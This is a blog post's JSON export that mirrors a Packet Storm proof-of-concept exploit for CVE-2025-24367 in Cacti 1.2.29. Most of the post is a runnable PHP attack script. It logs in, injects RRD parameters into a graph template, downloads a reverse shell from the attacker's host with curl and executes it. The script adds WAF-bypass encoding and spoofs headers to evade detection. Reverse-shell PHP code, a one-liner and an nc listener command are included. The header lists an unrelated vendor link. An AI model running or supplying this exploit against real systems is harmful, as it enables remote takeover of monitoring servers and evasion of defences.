{"id":29319,"date":"2025-12-08T09:42:02","date_gmt":"2025-12-08T09:42:02","guid":{"rendered":"http:\/\/localhost\/?p=29319"},"modified":"2025-12-08T09:42:02","modified_gmt":"2025-12-08T09:42:02","slug":"cacti-1229-remote-command-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=29319","title":{"rendered":"\ud83d\udcc4 Cacti 1.2.29 Remote Command Execution_PACKETSTORM:212534"},"content":{"rendered":"

{“lastseen”:”2025-12-08T15:28:13″,”description”:”Proof of concept exploit that demonstrates how authenticated users with access to Graph Templates in Cacti can abuse RRD invocation parameters to write arbitrary PHP files, then trigger execution leading to remote command execution. Version 1.2.29 is…”,”published”:”2025-12-08T00:00:00″,”modified”:”2025-12-08T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Cacti 1.2.29 Remote Command Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:212534″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-24367″],”sourceData”:”=============================================================================================================================================\\n | # Title : Cacti 1.2.29 Authenticated Graph Template RCE |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/wordpress.org\/plugins\/document-library-lite\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/211135\/ \\u0026 \\tCVE-2025-24367\\n \\n [+] Summary : Authenticated users with access to Graph Templates in Cacti can abuse RRD invocation parameters to write arbitrary PHP files, then trigger execution\\n leading to Remote Command Execution.\\n \\t\\t\\t \\n [+] POC : * Usage: Save this file as: exploit.php\\n Run: php exploit.php\\n \\t\\t\\t\\t\\t\\t\\t\\t\\n Run the listener on your machine: nc -nlvp 4444\\n \\n Upload the Reverse Shell content to your server (shell.txt):\\n \\n \\u003c?php\\n $sock=fsockopen(\\”YOUR_IP\\”,4444);\\n \\n $proc=proc_open(‘\/bin\/sh -i’, array(0=\\u003e$sock, 1=\\u003e$sock, 2=\\u003e$sock), $pipes);\\n \\n ?\\u003e\\n \\n Or One-liner:\\n \\n php -r ‘$s=fsockopen(\\”YOUR_IP\\”,4444);exec(\\”\/bin\/sh -i \\u003c\\u00263 \\u003e\\u00263 2\\u003e\\u00263\\”);’\\n \\n \\n \\u003c?php\\n \/**\\n * CVE-2025-24367 – Cacti Authenticated Graph Template RCE \\n * Features:\\n * – SOCKS5 Proxy Support\\n * – WAF Bypass Techniques\\n * – Permission Upload Verification\\n * – Blind Version Detection\\n * – Multi-Encoding Payloads\\n *\/\\n \\n \/\/ ==================== CONFIGURATION ======================\\n $base_url = \\”http:\/\/TARGET\\”; \/\/ Target URL\\n $username = \\”admin\\”; \/\/ Cacti username\\n $password = \\”admin\\”; \/\/ Cacti password\\n $rev_ip = \\”YOUR_IP\\”; \/\/ Reverse shell IP\\n $rev_port = \\”4444\\”; \/\/ Reverse shell port\\n $use_proxy = false; \/\/ Enable proxy (Burp)\\n $proxy_type = \\”http\\”; \/\/ http or socks5\\n $proxy_addr = \\”127.0.0.1:8080\\”; \/\/ Proxy address\\n $bypass_waf = true; \/\/ Enable WAF bypass\\n $check_perms = true; \/\/ Check upload permissions\\n \/\/ =========================================================\\n \\n \/\/ Color output for CLI\\n define(‘RED’, \\”\\\\033[1;31m\\”);\\n define(‘GREEN’, \\”\\\\033[1;32m\\”);\\n define(‘YELLOW’, \\”\\\\033[1;33m\\”);\\n define(‘BLUE’, \\”\\\\033[1;34m\\”);\\n define(‘RESET’, \\”\\\\033[0m\\”);\\n \\n \/\/ Session management\\n $cookieFile = tempnam(sys_get_temp_dir(), \\”cactisess\\”);\\n $user_agents = [\\n ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’,\\n ‘Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 Chrome\/91.0.4472.124 Safari\/537.36’,\\n ‘Cacti-Monitor\/1.0 (+http:\/\/cacti.net)’\\n ];\\n \\n function req_get($url, $proxy=false, $headers=[]) {\\n global $cookieFile, $proxy_type, $proxy_addr, $user_agents;\\n \\n $ch = curl_init();\\n $opts = [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_COOKIEFILE =\\u003e $cookieFile,\\n CURLOPT_COOKIEJAR =\\u003e $cookieFile,\\n CURLOPT_FOLLOWLOCATION =\\u003e true,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_TIMEOUT =\\u003e 15,\\n CURLOPT_USERAGENT =\\u003e $user_agents[array_rand($user_agents)],\\n CURLOPT_HTTPHEADER =\\u003e array_merge([\\n ‘X-Forwarded-For: ‘ . rand(1,255) . ‘.’ . rand(1,255) . ‘.’ . rand(1,255) . ‘.’ . rand(1,255),\\n ‘Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8’,\\n ‘Accept-Language: en-US,en;q=0.5’,\\n ‘Accept-Encoding: gzip, deflate’,\\n ‘Connection: keep-alive’,\\n ‘Upgrade-Insecure-Requests: 1’,\\n ‘Cache-Control: max-age=0’\\n ], $headers)\\n ];\\n \\n if ($proxy) {\\n if ($proxy_type === \\”socks5\\”) {\\n curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);\\n }\\n curl_setopt($ch, CURLOPT_PROXY, $proxy_addr);\\n }\\n \\n curl_setopt_array($ch, $opts);\\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n curl_close($ch);\\n \\n return [‘code’ =\\u003e $http_code, ‘body’ =\\u003e $response];\\n }\\n \\n function req_post($url, $data, $proxy=false, $headers=[]) {\\n global $cookieFile, $proxy_type, $proxy_addr, $user_agents;\\n \\n \/\/ WAF bypass: multiple encoding techniques\\n $encoded_data = $data;\\n if (isset($data[‘right_axis_label’])) {\\n $encoded_data[‘right_axis_label’] = waf_bypass($data[‘right_axis_label’]);\\n }\\n \\n $ch = curl_init();\\n $opts = [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_POST =\\u003e true,\\n CURLOPT_POSTFIELDS =\\u003e http_build_query($encoded_data),\\n CURLOPT_COOKIEFILE =\\u003e $cookieFile,\\n CURLOPT_COOKIEJAR =\\u003e $cookieFile,\\n CURLOPT_FOLLOWLOCATION =\\u003e true,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_TIMEOUT =\\u003e 20,\\n CURLOPT_USERAGENT =\\u003e $user_agents[array_rand($user_agents)],\\n CURLOPT_HTTPHEADER =\\u003e array_merge([\\n ‘Content-Type: application\/x-www-form-urlencoded’,\\n ‘X-Requested-With: XMLHttpRequest’,\\n ‘X-Forwarded-For: ‘ . rand(1,255) . ‘.’ . rand(1,255) . ‘.’ . rand(1,255) . ‘.’ . rand(1,255)\\n ], $headers)\\n ];\\n \\n if ($proxy) {\\n if ($proxy_type === \\”socks5\\”) {\\n curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);\\n }\\n curl_setopt($ch, CURLOPT_PROXY, $proxy_addr);\\n }\\n \\n curl_setopt_array($ch, $opts);\\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n curl_close($ch);\\n \\n return [‘code’ =\\u003e $http_code, ‘body’ =\\u003e $response];\\n }\\n \\n function waf_bypass($payload) {\\n global $bypass_waf;\\n \\n if (!$bypass_waf) return $payload;\\n \\n \/\/ Multiple bypass techniques\\n $techniques = [\\n \/\/ URL encoding\\n function($p) { return str_replace([‘ ‘, ‘`’, ‘$’], [‘%20’, ‘%60’, ‘%24’], $p); },\\n \/\/ Double URL encoding\\n function($p) { return str_replace([‘\/’, ‘ ‘], [‘%252F’, ‘%2520’], $p); },\\n \/\/ Hex encoding for commands\\n function($p) { \\n return preg_replace_callback(‘\/\\\\b(curl|bash|wget|nc)\\\\b\/’, \\n function($m) { return bin2hex($m[0]); }, $p);\\n },\\n \/\/ Case manipulation\\n function($p) { return preg_replace_callback(‘\/\\\\b([A-Z]+)\\\\b\/i’, \\n function($m) { \\n $word = $m[0];\\n $new = ”;\\n for($i=0; $i\\u003cstrlen($word); $i++) {\\n $new .= (rand(0,1)) ? strtoupper($word[$i]) : strtolower($word[$i]);\\n }\\n return $new;\\n }, $p);\\n },\\n \/\/ Insert null bytes\\n function($p) { return str_replace(‘ ‘, ‘%00’, $p); },\\n \/\/ Use alternative syntax\\n function($p) { \\n $p = str_replace(‘`’, ‘$(‘, $p);\\n $p = str_replace(‘`’, ‘)’, $p);\\n return $p;\\n }\\n ];\\n \\n foreach ($techniques as $tech) {\\n $payload = $tech($payload);\\n \/\/ Add random sleep to avoid rate limiting\\n usleep(rand(10000, 50000));\\n }\\n \\n return $payload;\\n }\\n \\n function detect_cacti_version($base_url) {\\n echo BLUE . \\”[*] Blind version detection…\\” . RESET . \\”\\\\n\\”;\\n \\n $indicators = [\\n ‘\/1\\\\\\\\.2\\\\\\\\.\/’ =\\u003e ‘1.2.x’,\\n ‘\/1\\\\\\\\.3\\\\\\\\.\/’ =\\u003e ‘1.3.x’,\\n ‘\/cacti_version=1\\\\\\\\.0\/’ =\\u003e ‘1.0.x’,\\n ‘\/version.*?\\\\\\\\d+\\\\\\\\.\\\\\\\\d+\\\\\\\\.\\\\\\\\d+\/’ =\\u003e ‘Unknown’\\n ];\\n \\n $checks = [\\n ‘\/cacti\/include\/global_arrays.php’,\\n ‘\/cacti\/include\/global_settings.php’,\\n ‘\/cacti\/CHANGELOG’,\\n ‘\/cacti\/README’\\n ];\\n \\n foreach ($checks as $check) {\\n $result = req_get($base_url . $check);\\n if ($result[‘code’] == 200) {\\n foreach ($indicators as $pattern =\\u003e $version) {\\n if (preg_match($pattern, $result[‘body’])) {\\n echo GREEN . \\”[+] Detected Cacti version: \\” . $version . RESET . \\”\\\\n\\”;\\n return $version;\\n }\\n }\\n }\\n }\\n \\n \/\/ Try to extract from HTML comments\\n $home = req_get($base_url . ‘\/cacti\/’);\\n if (preg_match(‘\/\\u003c!–.*?Cacti v?(\\\\d+\\\\.\\\\d+\\\\.\\\\d+).*?–\\u003e\/i’, $home[‘body’], $matches)) {\\n echo GREEN . \\”[+] Detected Cacti version from comments: \\” . $matches[1] . RESET . \\”\\\\n\\”;\\n return $matches[1];\\n }\\n \\n echo YELLOW . \\”[!] Could not detect exact version\\” . RESET . \\”\\\\n\\”;\\n return \\”unknown\\”;\\n }\\n \\n function check_permissions($base_url) {\\n echo BLUE . \\”[*] Checking upload permissions…\\” . RESET . \\”\\\\n\\”;\\n \\n $test_files = [\\n ‘\/cacti\/images\/logo.gif’,\\n ‘\/cacti\/include\/config.php’,\\n ‘\/cacti\/plugins\/’\\n ];\\n \\n foreach ($test_files as $file) {\\n $result = req_get($base_url . $file);\\n if ($result[‘code’] == 200 || $result[‘code’] == 403) {\\n echo YELLOW . \\”[!] File accessible: \\” . $file . \\” (HTTP: \\” . $result[‘code’] . \\”)\\” . RESET . \\”\\\\n\\”;\\n }\\n }\\n \\n \/\/ Try to detect writable directories\\n $writable_dirs = [‘\/cacti\/cache\/’, ‘\/cacti\/log\/’, ‘\/cacti\/rra\/’];\\n foreach ($writable_dirs as $dir) {\\n $result = req_get($base_url . $dir);\\n if ($result[‘code’] == 200) {\\n echo GREEN . \\”[+] Potentially writable directory: \\” . $dir . RESET . \\”\\\\n\\”;\\n }\\n }\\n \\n return true;\\n }\\n \\n function exploit_stage($stage, $template_id) {\\n global $base_url, $rev_ip, $rev_port, $use_proxy, $check_perms;\\n \\n echo BLUE . \\”[*] Executing stage: \\” . $stage . RESET . \\”\\\\n\\”;\\n \\n \/\/ Get CSRF token\\n $page = req_get($base_url . \\”\/cacti\/graph_templates.php?action=template_edit\\u0026id=\\” . $template_id, $use_proxy);\\n if (!preg_match(‘\/var csrfMagicToken\\\\s*=\\\\s*\\”([^\\”]+)\\”\/’, $page[‘body’], $matches)) {\\n echo RED . \\”[-] Failed to get CSRF token\\” . RESET . \\”\\\\n\\”;\\n return false;\\n }\\n $csrf = $matches[1];\\n \\n $filename = bin2hex(random_bytes(4)) . \\”.php\\”;\\n \\n if ($stage == \\”write\\”) {\\n \/\/ Stage 1: Download reverse shell\\n $payload = \\”XXX\\\\ncreate x –step 300 DS:temp GAUGE\\\\n\\” .\\n \\”graph \\” . $filename . \\” -s now -a CSV \\” .\\n \\”DEF:x=x:temp:AVERAGE LINE1:x:`\\” . \\n waf_bypass(\\”curl -s \\” . $rev_ip . \\”\/shell.txt -o \/tmp\/shell.php\\”) . \\n \\”`\\”;\\n } else {\\n \/\/ Stage 2: Execute reverse shell\\n $payload = \\”XXX\\\\ncreate x –step 300 DS:temp GAUGE\\\\n\\” .\\n \\”graph \\” . $filename . \\” -s now -a CSV \\” .\\n \\”DEF:x=x:temp:AVERAGE LINE1:x:`\\” .\\n waf_bypass(\\”php \/tmp\/shell.php \\” . $rev_ip . \\” \\” . $rev_port) .\\n \\”`\\”;\\n }\\n \\n $post_data = [\\n ‘__csrf_magic’ =\\u003e $csrf,\\n ‘name’ =\\u003e ‘Unix – Logged in Users’,\\n ‘graph_template_id’ =\\u003e $template_id,\\n ‘graph_template_graph_id’ =\\u003e $template_id,\\n ‘save_component_template’ =\\u003e ‘1’,\\n ‘title’ =\\u003e ‘|host_description| – Logged in Users’,\\n ‘right_axis_label’ =\\u003e $payload,\\n ‘action’ =\\u003e ‘save’\\n ];\\n \\n \/\/ Submit payload\\n $result = req_post($base_url . \\”\/cacti\/graph_templates.php?header=false\\”, $post_data, $use_proxy);\\n \\n if ($result[‘code’] == 200) {\\n echo GREEN . \\”[+] Stage \\” . $stage . \\” executed successfully\\” . RESET . \\”\\\\n\\”;\\n \\n \/\/ Trigger the graph generation\\n req_get($base_url . \\”\/cacti\/graph_json.php?rra_id=0\\u0026local_graph_id=3\\”, $use_proxy);\\n \\n \/\/ Check if file was created\\n if ($check_perms) {\\n $check = req_get($base_url . \\”\/cacti\/\\” . $filename, $use_proxy);\\n if ($check[‘code’] == 200) {\\n echo GREEN . \\”[+] File created: \\” . $filename . RESET . \\”\\\\n\\”;\\n }\\n }\\n \\n return true;\\n } else {\\n echo RED . \\”[-] Stage \\” . $stage . \\” failed (HTTP: \\” . $result[‘code’] . \\”)\\” . RESET . \\”\\\\n\\”;\\n return false;\\n }\\n }\\n \\n \/\/ ==================== MAIN EXECUTION ======================\\n echo GREEN . \\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 Cacti CVE-2025-24367 Exploit by indoushka \u2551\\n \u2551 Features: SOCKS5, WAF Bypass, Blind Detection \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\” . RESET . \\”\\\\n\\\\n\\”;\\n \\n \/\/ 1. Initial detection\\n echo BLUE . \\”[*] Detecting Cacti…\\” . RESET . \\”\\\\n\\”;\\n $result = req_get($base_url, $use_proxy);\\n if (!str_contains($result[‘body’], ‘Cacti’) \\u0026\\u0026 !str_contains($result[‘body’], ‘cacti’)) {\\n die(RED . \\”[-] Target does not appear to be Cacti\\” . RESET . \\”\\\\n\\”);\\n }\\n echo GREEN . \\”[+] Cacti detected!\\” . RESET . \\”\\\\n\\”;\\n \\n \/\/ 2. Version detection (blind)\\n $version = detect_cacti_version($base_url);\\n \\n \/\/ 3. Permission check\\n if ($check_perms) {\\n check_permissions($base_url);\\n }\\n \\n \/\/ 4. Login\\n echo BLUE . \\”[*] Attempting login…\\” . RESET . \\”\\\\n\\”;\\n $login_page = req_get($base_url . \\”\/cacti\/index.php\\”, $use_proxy);\\n if (!preg_match(‘\/var csrfMagicToken\\\\s*=\\\\s*\\”([^\\”]+)\\”\/’, $login_page[‘body’], $matches)) {\\n die(RED . \\”[-] Could not extract CSRF token\\” . RESET . \\”\\\\n\\”);\\n }\\n $csrf = $matches[1];\\n \\n $login_data = [\\n ‘__csrf_magic’ =\\u003e $csrf,\\n ‘action’ =\\u003e ‘login’,\\n ‘login_username’ =\\u003e $username,\\n ‘login_password’ =\\u003e $password\\n ];\\n \\n $login_result = req_post($base_url . \\”\/cacti\/index.php\\”, $login_data, $use_proxy);\\n if (!str_contains($login_result[‘body’], ‘Console’) \\u0026\\u0026 !str_contains($login_result[‘body’], ‘Logout’)) {\\n die(RED . \\”[-] Login failed\\” . RESET . \\”\\\\n\\”);\\n }\\n echo GREEN . \\”[+] Login successful!\\” . RESET . \\”\\\\n\\”;\\n \\n \/\/ 5. Find template ID\\n echo BLUE . \\”[*] Searching for template ID…\\” . RESET . \\”\\\\n\\”;\\n $search = req_get($base_url . \\”\/cacti\/graph_templates.php?filter=Unix%20-%20Logged%20in%20Users\\u0026rows=-1\\u0026has_graphs=false\\”, $use_proxy);\\n if (!preg_match(‘\/id=\\”chk_(\\\\d+)\\”\/’, $search[‘body’], $matches)) {\\n \/\/ Try alternative search\\n $search = req_get($base_url . \\”\/cacti\/graph_templates.php\\”, $use_proxy);\\n if (preg_match(‘\/value=\\”(\\\\d+)\\”[^\\u003e]*\\u003eUnix – Logged in Users\/’, $search[‘body’], $matches)) {\\n $template_id = $matches[1];\\n } else {\\n die(RED . \\”[-] Could not find template ID\\” . RESET . \\”\\\\n\\”);\\n }\\n } else {\\n $template_id = $matches[1];\\n }\\n echo GREEN . \\”[+] Template ID found: \\” . $template_id . RESET . \\”\\\\n\\”;\\n \\n \/\/ 6. Execute exploit stages\\n echo BLUE . \\”[*] Starting exploitation…\\” . RESET . \\”\\\\n\\”;\\n \\n if (exploit_stage(\\”write\\”, $template_id)) {\\n echo YELLOW . \\”[*] Waiting for stage 1 to complete…\\” . RESET . \\”\\\\n\\”;\\n sleep(3); \/\/ Wait for download\\n \\n if (exploit_stage(\\”exec\\”, $template_id)) {\\n echo GREEN . \\”[+] Exploitation completed!\\” . RESET . \\”\\\\n\\”;\\n echo YELLOW . \\”[*] Check your listener: nc -nlvp \\” . $rev_port . RESET . \\”\\\\n\\”;\\n echo YELLOW . \\”[*] Shell should connect to \\” . $rev_ip . \\”:\\” . $rev_port . RESET . \\”\\\\n\\”;\\n } else {\\n echo RED . \\”[-] Stage 2 failed\\” . RESET . \\”\\\\n\\”;\\n }\\n } else {\\n echo RED . \\”[-] Stage 1 failed\\” . RESET . \\”\\\\n\\”;\\n }\\n \\n \/\/ 7. Cleanup\\n echo BLUE . \\”[*] Cleaning up…\\” . RESET . \\”\\\\n\\”;\\n @unlink($cookieFile);\\n \\n echo GREEN . \\”[+] Done!\\” . RESET . \\”\\\\n\\”;\\n \\n \/\/ ==================== REVERSE SHELL CONTENT ======================\\n echo YELLOW . \\”\\\\n[*] Reverse shell content (save as shell.txt on your server):\\” . RESET . \\”\\\\n\\”;\\n echo \\”\\u003c?php\\n \\\\$sock=fsockopen(\\\\\\”\\” . $rev_ip . \\”\\\\\\”,\\” . $rev_port . \\”);\\n \\\\$proc=proc_open(‘\/bin\/sh -i’, array(0=\\u003e\\\\$sock, 1=\\u003e\\\\$sock, 2=\\u003e\\\\$sock), \\\\$pipes);\\n ?\\u003e\\\\n\\”;\\n ?\\u003e\\n \\n \\u003c?php\\n \/\/ Alternative: One-liner reverse shell\\n echo YELLOW . \\”[*] One-liner alternative:\\” . RESET . \\”\\\\n\\”;\\n echo \\”php -r ‘\\\\$s=fsockopen(\\\\\\”\\” . $rev_ip . \\”\\\\\\”,\\” . $rev_port . \\”);exec(\\\\\\”\/bin\/sh -i \\u003c\\u00263 \\u003e\\u00263 2\\u003e\\u00263\\\\\\”);’\\\\n\\”;\\n ?\\u003e\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212534″,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212534\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-08T15:28:13″,”description”:”Proof of concept exploit that demonstrates how authenticated users with access to Graph Templates in Cacti can abuse RRD invocation parameters to write arbitrary PHP…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,13,53,7,11,5],"class_list":["post-29319","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Cacti 1.2.29 Remote Command Execution_PACKETSTORM:212534 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=29319\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Cacti 1.2.29 Remote Command Execution_PACKETSTORM:212534 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-08T15:28:13″,”description”:”Proof of concept exploit that demonstrates how authenticated users with access to Graph Templates in Cacti can abuse RRD invocation parameters to write arbitrary PHP...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=29319\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-08T09:42:02+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29319#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29319\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Cacti 1.2.29 Remote Command Execution_PACKETSTORM:212534\",\"datePublished\":\"2025-12-08T09:42:02+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29319\"},\"wordCount\":2340,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.8\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=29319#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29319\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29319\",\"name\":\"\ud83d\udcc4 Cacti 1.2.29 Remote Command Execution_PACKETSTORM:212534 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-08T09:42:02+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29319#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=29319\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29319#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Cacti 1.2.29 Remote Command Execution_PACKETSTORM:212534\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Cacti 1.2.29 Remote Command Execution_PACKETSTORM:212534 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=29319","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Cacti 1.2.29 Remote Command Execution_PACKETSTORM:212534 - zero redgem","og_description":"{“lastseen”:”2025-12-08T15:28:13″,”description”:”Proof of concept exploit that demonstrates how authenticated users with access to Graph Templates in Cacti can abuse RRD invocation parameters to write arbitrary PHP...","og_url":"https:\/\/zero.redgem.net\/?p=29319","og_site_name":"zero redgem","article_published_time":"2025-12-08T09:42:02+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"12 